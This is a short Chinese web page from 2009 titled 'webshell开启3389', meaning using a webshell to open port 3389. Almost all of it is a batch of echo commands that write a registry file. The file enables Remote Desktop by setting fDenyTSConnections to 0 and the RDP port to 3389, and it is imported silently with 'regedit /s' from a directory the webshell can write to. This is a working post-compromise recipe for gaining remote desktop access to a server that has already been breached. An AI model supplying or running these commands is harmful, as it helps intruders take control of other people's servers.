首页 电脑 电脑学堂 查看内容

webshell开启3389

2009-9-17 10:04 797 0

摘要: 程序代码echo Windows Registry Editor Version 5.00 >>3389.regecho [HKEY_LOCAL_MACHINESYSTEMCurren...
关键词: 3389 regecho CurrentControlSe Terminal Control MACHINE SYSTEM Server LOCAL dword

程序代码echo Windows Registry Editor Version 5.00 >>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.regecho "fDenyTSConnections"=dword:00000000>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.regecho "PortNumber"=dword:00000D3D >>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.regecho "PortNumber"=dword:00000D3D >>3389.regregedit /s 3389.reg 3389.reg加上webshell可写目录
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部